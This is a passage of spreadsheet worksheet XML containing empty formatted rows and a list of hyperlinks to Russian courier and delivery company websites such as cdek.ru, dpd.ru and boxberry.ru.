      <c r="D113" s="3"/>
      <c r="E113" s="3"/>
    </row>
    <row r="114" ht="15.35" customHeight="1">
      <c r="A114" s="7"/>
      <c r="B114" s="8"/>
      <c r="C114" s="9"/>
      <c r="D114" s="3"/>
      <c r="E114" s="3"/>
    </row>
    <row r="115" ht="15.35" customHeight="1">
      <c r="A115" s="7"/>
      <c r="B115" s="8"/>
      <c r="C115" s="9"/>
      <c r="D115" s="3"/>
      <c r="E115" s="3"/>
    </row>
    <row r="116" ht="15.35" customHeight="1">
      <c r="A116" s="7"/>
      <c r="B116" s="8"/>
      <c r="C116" s="9"/>
      <c r="D116" s="3"/>
      <c r="E116" s="3"/>
    </row>
    <row r="117" ht="15.35" customHeight="1">
      <c r="A117" s="7"/>
      <c r="B117" s="8"/>
      <c r="C117" s="9"/>
      <c r="D117" s="3"/>
      <c r="E117" s="3"/>
    </row>
    <row r="118" ht="15.35" customHeight="1">
      <c r="A118" s="7"/>
      <c r="B118" s="8"/>
      <c r="C118" s="9"/>
      <c r="D118" s="3"/>
      <c r="E118" s="3"/>
    </row>
    <row r="119" ht="15.35" customHeight="1">
      <c r="A119" s="7"/>
      <c r="B119" s="8"/>
      <c r="C119" s="9"/>
      <c r="D119" s="3"/>
      <c r="E119" s="3"/>
    </row>
    <row r="120" ht="15.35" customHeight="1">
      <c r="A120" s="7"/>
      <c r="B120" s="8"/>
      <c r="C120" s="9"/>
      <c r="D120" s="3"/>
      <c r="E120" s="3"/>
    </row>
    <row r="121" ht="15.35" customHeight="1">
      <c r="A121" s="7"/>
      <c r="B121" s="8"/>
      <c r="C121" s="9"/>
      <c r="D121" s="3"/>
      <c r="E121" s="3"/>
    </row>
    <row r="122" ht="15.35" customHeight="1">
      <c r="A122" s="7"/>
      <c r="B122" s="8"/>
      <c r="C122" s="9"/>
      <c r="D122" s="3"/>
      <c r="E122" s="3"/>
    </row>
    <row r="123" ht="15.35" customHeight="1">
      <c r="A123" s="7"/>
      <c r="B123" s="8"/>
      <c r="C123" s="9"/>
      <c r="D123" s="3"/>
      <c r="E123" s="3"/>
    </row>
    <row r="124" ht="15.35" customHeight="1">
      <c r="A124" s="7"/>
      <c r="B124" s="8"/>
      <c r="C124" s="9"/>
      <c r="D124" s="3"/>
      <c r="E124" s="3"/>
    </row>
    <row r="125" ht="15.35" customHeight="1">
      <c r="A125" s="7"/>
      <c r="B125" s="8"/>
      <c r="C125" s="9"/>
      <c r="D125" s="3"/>
      <c r="E125" s="3"/>
    </row>
    <row r="126" ht="15.35" customHeight="1">
      <c r="A126" s="10"/>
      <c r="B126" s="11"/>
      <c r="C126" s="12"/>
      <c r="D126" s="3"/>
      <c r="E126" s="3"/>
    </row>
    <row r="127" ht="15.35" customHeight="1">
      <c r="A127" s="2"/>
      <c r="B127" s="2"/>
      <c r="C127" s="2"/>
      <c r="D127" s="3"/>
      <c r="E127" s="3"/>
    </row>
    <row r="128" ht="15.35" customHeight="1">
      <c r="A128" s="2"/>
      <c r="B128" s="2"/>
      <c r="C128" s="2"/>
      <c r="D128" s="3"/>
      <c r="E128" s="3"/>
    </row>
    <row r="129" ht="15.35" customHeight="1">
      <c r="A129" s="2"/>
      <c r="B129" s="2"/>
      <c r="C129" s="2"/>
      <c r="D129" s="3"/>
      <c r="E129" s="3"/>
    </row>
    <row r="130" ht="15.35" customHeight="1">
      <c r="A130" s="2"/>
      <c r="B130" s="2"/>
      <c r="C130" s="2"/>
      <c r="D130" s="3"/>
      <c r="E130" s="3"/>
    </row>
    <row r="131" ht="15.35" customHeight="1">
      <c r="A131" s="2"/>
      <c r="B131" s="2"/>
      <c r="C131" s="2"/>
      <c r="D131" s="3"/>
      <c r="E131" s="3"/>
    </row>
    <row r="132" ht="15.35" customHeight="1">
      <c r="A132" s="2"/>
      <c r="B132" s="2"/>
      <c r="C132" s="2"/>
      <c r="D132" s="3"/>
      <c r="E132" s="3"/>
    </row>
    <row r="133" ht="15.35" customHeight="1">
      <c r="A133" s="2"/>
      <c r="B133" s="2"/>
      <c r="C133" s="2"/>
      <c r="D133" s="3"/>
      <c r="E133" s="3"/>
    </row>
    <row r="134" ht="15.35" customHeight="1">
      <c r="A134" s="2"/>
      <c r="B134" s="2"/>
      <c r="C134" s="2"/>
      <c r="D134" s="3"/>
      <c r="E134" s="3"/>
    </row>
    <row r="135" ht="15.35" customHeight="1">
      <c r="A135" s="2"/>
      <c r="B135" s="2"/>
      <c r="C135" s="2"/>
      <c r="D135" s="3"/>
      <c r="E135" s="3"/>
    </row>
    <row r="136" ht="15.35" customHeight="1">
      <c r="A136" s="2"/>
      <c r="B136" s="2"/>
      <c r="C136" s="2"/>
      <c r="D136" s="3"/>
      <c r="E136" s="3"/>
    </row>
    <row r="137" ht="15.35" customHeight="1">
      <c r="A137" s="2"/>
      <c r="B137" s="2"/>
      <c r="C137" s="2"/>
      <c r="D137" s="3"/>
      <c r="E137" s="3"/>
    </row>
    <row r="138" ht="15.35" customHeight="1">
      <c r="A138" s="2"/>
      <c r="B138" s="2"/>
      <c r="C138" s="2"/>
      <c r="D138" s="3"/>
      <c r="E138" s="3"/>
    </row>
    <row r="139" ht="15.35" customHeight="1">
      <c r="A139" s="2"/>
      <c r="B139" s="2"/>
      <c r="C139" s="2"/>
      <c r="D139" s="3"/>
      <c r="E139" s="3"/>
    </row>
    <row r="140" ht="15.35" customHeight="1">
      <c r="A140" s="2"/>
      <c r="B140" s="2"/>
      <c r="C140" s="2"/>
      <c r="D140" s="3"/>
      <c r="E140" s="3"/>
    </row>
    <row r="141" ht="15.35" customHeight="1">
      <c r="A141" s="2"/>
      <c r="B141" s="2"/>
      <c r="C141" s="2"/>
      <c r="D141" s="3"/>
      <c r="E141" s="3"/>
    </row>
    <row r="142" ht="15.35" customHeight="1">
      <c r="A142" s="2"/>
      <c r="B142" s="2"/>
      <c r="C142" s="2"/>
      <c r="D142" s="3"/>
      <c r="E142" s="3"/>
    </row>
    <row r="143" ht="15.35" customHeight="1">
      <c r="A143" s="2"/>
      <c r="B143" s="2"/>
      <c r="C143" s="2"/>
      <c r="D143" s="3"/>
      <c r="E143" s="3"/>
    </row>
    <row r="144" ht="15.35" customHeight="1">
      <c r="A144" s="2"/>
      <c r="B144" s="2"/>
      <c r="C144" s="2"/>
      <c r="D144" s="3"/>
      <c r="E144" s="3"/>
    </row>
    <row r="145" ht="15.35" customHeight="1">
      <c r="A145" s="2"/>
      <c r="B145" s="2"/>
      <c r="C145" s="2"/>
      <c r="D145" s="3"/>
      <c r="E145" s="3"/>
    </row>
    <row r="146" ht="15.35" customHeight="1">
      <c r="A146" s="2"/>
      <c r="B146" s="2"/>
      <c r="C146" s="2"/>
      <c r="D146" s="3"/>
      <c r="E146" s="3"/>
    </row>
    <row r="147" ht="15.35" customHeight="1">
      <c r="A147" s="2"/>
      <c r="B147" s="2"/>
      <c r="C147" s="2"/>
      <c r="D147" s="3"/>
      <c r="E147" s="3"/>
    </row>
    <row r="148" ht="15.35" customHeight="1">
      <c r="A148" s="2"/>
      <c r="B148" s="2"/>
      <c r="C148" s="2"/>
      <c r="D148" s="3"/>
      <c r="E148" s="3"/>
    </row>
    <row r="149" ht="15.35" customHeight="1">
      <c r="A149" s="2"/>
      <c r="B149" s="2"/>
      <c r="C149" s="2"/>
      <c r="D149" s="3"/>
      <c r="E149" s="3"/>
    </row>
    <row r="150" ht="15.35" customHeight="1">
      <c r="A150" s="2"/>
      <c r="B150" s="2"/>
      <c r="C150" s="2"/>
      <c r="D150" s="3"/>
      <c r="E150" s="3"/>
    </row>
    <row r="151" ht="15.35" customHeight="1">
      <c r="A151" s="2"/>
      <c r="B151" s="2"/>
      <c r="C151" s="2"/>
      <c r="D151" s="3"/>
      <c r="E151" s="3"/>
    </row>
    <row r="152" ht="15.35" customHeight="1">
      <c r="A152" s="2"/>
      <c r="B152" s="2"/>
      <c r="C152" s="2"/>
      <c r="D152" s="3"/>
      <c r="E152" s="3"/>
    </row>
    <row r="153" ht="15.35" customHeight="1">
      <c r="A153" s="2"/>
      <c r="B153" s="2"/>
      <c r="C153" s="2"/>
      <c r="D153" s="3"/>
      <c r="E153" s="3"/>
    </row>
    <row r="154" ht="15.35" customHeight="1">
      <c r="A154" s="2"/>
      <c r="B154" s="2"/>
      <c r="C154" s="2"/>
      <c r="D154" s="3"/>
      <c r="E154" s="3"/>
    </row>
    <row r="155" ht="15.35" customHeight="1">
      <c r="A155" s="2"/>
      <c r="B155" s="2"/>
      <c r="C155" s="2"/>
      <c r="D155" s="3"/>
      <c r="E155" s="3"/>
    </row>
    <row r="156" ht="15.35" customHeight="1">
      <c r="A156" s="2"/>
      <c r="B156" s="2"/>
      <c r="C156" s="2"/>
      <c r="D156" s="3"/>
      <c r="E156" s="3"/>
    </row>
    <row r="157" ht="15.35" customHeight="1">
      <c r="A157" s="2"/>
      <c r="B157" s="2"/>
      <c r="C157" s="2"/>
      <c r="D157" s="3"/>
      <c r="E157" s="3"/>
    </row>
    <row r="158" ht="15.35" customHeight="1">
      <c r="A158" s="2"/>
      <c r="B158" s="2"/>
      <c r="C158" s="2"/>
      <c r="D158" s="3"/>
      <c r="E158" s="3"/>
    </row>
    <row r="159" ht="15.35" customHeight="1">
      <c r="A159" s="2"/>
      <c r="B159" s="2"/>
      <c r="C159" s="2"/>
      <c r="D159" s="3"/>
      <c r="E159" s="3"/>
    </row>
    <row r="160" ht="15.35" customHeight="1">
      <c r="A160" s="2"/>
      <c r="B160" s="2"/>
      <c r="C160" s="2"/>
      <c r="D160" s="3"/>
      <c r="E160" s="3"/>
    </row>
    <row r="161" ht="15.35" customHeight="1">
      <c r="A161" s="2"/>
      <c r="B161" s="2"/>
      <c r="C161" s="2"/>
      <c r="D161" s="3"/>
      <c r="E161" s="3"/>
    </row>
    <row r="162" ht="15.35" customHeight="1">
      <c r="A162" s="2"/>
      <c r="B162" s="2"/>
      <c r="C162" s="2"/>
      <c r="D162" s="3"/>
      <c r="E162" s="3"/>
    </row>
    <row r="163" ht="15.35" customHeight="1">
      <c r="A163" s="2"/>
      <c r="B163" s="2"/>
      <c r="C163" s="2"/>
      <c r="D163" s="3"/>
      <c r="E163" s="3"/>
    </row>
    <row r="164" ht="15.35" customHeight="1">
      <c r="A164" s="2"/>
      <c r="B164" s="2"/>
      <c r="C164" s="2"/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hyperlinks>
    <hyperlink ref="C1" r:id="rId1" location="" tooltip="" display="ponyexpress.ru"/>
    <hyperlink ref="C2" r:id="rId2" location="" tooltip="" display="ponyexpress.ru"/>
    <hyperlink ref="C3" r:id="rId3" location="" tooltip="" display="ponyexpress.ru"/>
    <hyperlink ref="C4" r:id="rId4" location="" tooltip="" display="express.dhl.ru"/>
    <hyperlink ref="C5" r:id="rId5" location="" tooltip="" display="dpd.ru"/>
    <hyperlink ref="C6" r:id="rId6" location="" tooltip="" display="dpd.ru"/>
    <hyperlink ref="C7" r:id="rId7" location="" tooltip="" display="dpd.ru"/>
    <hyperlink ref="C8" r:id="rId8" location="" tooltip="" display="dpd.ru"/>
    <hyperlink ref="C9" r:id="rId9" location="" tooltip="" display="dpd.ru"/>
    <hyperlink ref="C10" r:id="rId10" location="" tooltip="" display="dpd.ru"/>
    <hyperlink ref="C11" r:id="rId11" location="" tooltip="" display="dpd.ru"/>
    <hyperlink ref="C12" r:id="rId12" location="" tooltip="" display="dpd.ru"/>
    <hyperlink ref="C13" r:id="rId13" location="" tooltip="" display="dpd.ru"/>
    <hyperlink ref="C14" r:id="rId14" location="" tooltip="" display="dpd.ru"/>
    <hyperlink ref="C15" r:id="rId15" location="" tooltip="" display="boxberry.ru"/>
    <hyperlink ref="C16" r:id="rId16" location="" tooltip="" display="boxberry.ru"/>
    <hyperlink ref="C17" r:id="rId17" location="" tooltip="" display="boxberry.ru"/>
    <hyperlink ref="C18" r:id="rId18" location="" tooltip="" display="boxberry.ru"/>
    <hyperlink ref="C19" r:id="rId19" location="" tooltip="" display="boxberry.ru"/>
    <hyperlink ref="C20" r:id="rId20" location="" tooltip="" display="cse.ru"/>
    <hyperlink ref="C21" r:id="rId21" location="" tooltip="" display="cse.ru"/>
    <hyperlink ref="C22" r:id="rId22" location="" tooltip="" display="cse.ru"/>
    <hyperlink ref="C23" r:id="rId23" location="" tooltip="" display="cse.ru"/>
    <hyperlink ref="C24" r:id="rId24" location="" tooltip="" display="cse.ru"/>
    <hyperlink ref="C25" r:id="rId25" location="" tooltip="" display="cse.ru"/>
    <hyperlink ref="C26" r:id="rId26" location="" tooltip="" display="cse.ru"/>
    <hyperlink ref="C27" r:id="rId27" location="" tooltip="" display="cse.ru"/>
    <hyperlink ref="C28" r:id="rId28" location="" tooltip="" display="cse.ru"/>
    <hyperlink ref="C29" r:id="rId29" location="" tooltip="" display="cse.ru"/>
    <hyperlink ref="C30" r:id="rId30" location="" tooltip="" display="cse.ru"/>
    <hyperlink ref="C31" r:id="rId31" location="" tooltip="" display="cse.ru"/>
    <hyperlink ref="C32" r:id="rId32" location="" tooltip="" display="cse.ru"/>
    <hyperlink ref="C33" r:id="rId33" location="" tooltip="" display="cse.ru"/>
    <hyperlink ref="C34" r:id="rId34" location="" tooltip="" display="cdek.ru"/>
    <hyperlink ref="C35" r:id="rId35" location="" tooltip="" display="cdek.ru"/>
    <hyperlink ref="C36" r:id="rId36" location="" tooltip="" display="cdek.ru"/>
    <hyperlink ref="C37" r:id="rId37" location="" tooltip="" display="cdek.ru"/>
    <hyperlink ref="C38" r:id="rId38" location="" tooltip="" display="cdek.ru"/>
    <hyperlink ref="C39" r:id="rId39" location="" tooltip="" display="cdek.ru"/>
    <hyperlink ref="C40" r:id="rId40" location="" tooltip="" display="cdek.ru"/>
    <hyperlink ref="C41" r:id="rId41" location="" tooltip="" display="cdek.ru"/>
    <hyperlink ref="C42" r:id="rId42" location="" tooltip="" display="cdek.ru"/>
    <hyperlink ref="C43" r:id="rId43" location="" tooltip="" display="cdek.ru"/>
    <hyperlink ref="C44" r:id="rId44" location="" tooltip="" display="cdek.ru"/>
    <hyperlink ref="C45" r:id="rId45" location="" tooltip="" display="cdek.ru"/>
    <hyperlink ref="C46" r:id="rId46" location="" tooltip="" display="cdek.ru"/>
    <hyperlink ref="C47" r:id="rId47" location="" tooltip="" display="cdek.ru"/>
    <hyperlink ref="C48" r:id="rId48" location="" tooltip="" display="cdek.ru"/>
    <hyperlink ref="C49" r:id="rId49" location="" tooltip="" display="cdek.ru"/>
    <hyperlink ref="C50" r:id="rId50" location="" tooltip="" display="cdek.ru"/>
    <hyperlink ref="C51" r:id="rId51" location="" tooltip="" display="cdek.ru"/>
    <hyperlink ref="C52" r:id="rId52" location="" tooltip="" display="dpd.ru"/>
    <hyperlink ref="C53" r:id="rId53" location="" tooltip="" display="dpd.ru"/>
    <hyperlink ref="C54" r:id="rId54" location="" tooltip="" display="dpd.ru"/>
    <hyperlink ref="C55" r:id="rId55" location="" tooltip="" display="dpd.ru"/>
    <hyperlink ref="C56" r:id="rId56" location="" tooltip="" display="dpd.ru"/>
    <hyperlink ref="C57" r:id="rId57" location="" tooltip="" display="dpd.ru"/>
    <hyperlink ref="C58" r:id="rId58" location="" tooltip="" display="dpd.ru"/>
    <hyperlink ref="C59" r:id="rId59" location="" tooltip="" display="dpd.ru"/>
    <hyperlink ref="C60" r:id="rId60" location="" tooltip="" display="dpd.ru"/>
    <hyperlink ref="C61" r:id="rId61" location="" tooltip="" display="dpd.ru"/>
    <hyperlink ref="C62" r:id="rId62" location="" tooltip="" display="dpd.ru"/>
    <hyperlink ref="C63" r:id="rId63" location="" tooltip="" display="dpd.ru"/>
    <hyperlink ref="C64" r:id="rId64" location="" tooltip="" display="dpd.ru"/>
    <hyperlink ref="C65" r:id="rId65" location="" tooltip="" display="dpd.ru"/>
    <hyperlink ref="C66" r:id="rId66" location="" tooltip="" display="dpd.ru"/>
    <hyperlink ref="C67" r:id="rId67" location="" tooltip="" display="dpd.ru"/>
    <hyperlink ref="C68" r:id="rId68" location="" tooltip="" display="dpd.ru"/>
    <hyperlink ref="C69" r:id="rId69" location="" tooltip="" display="dpd.ru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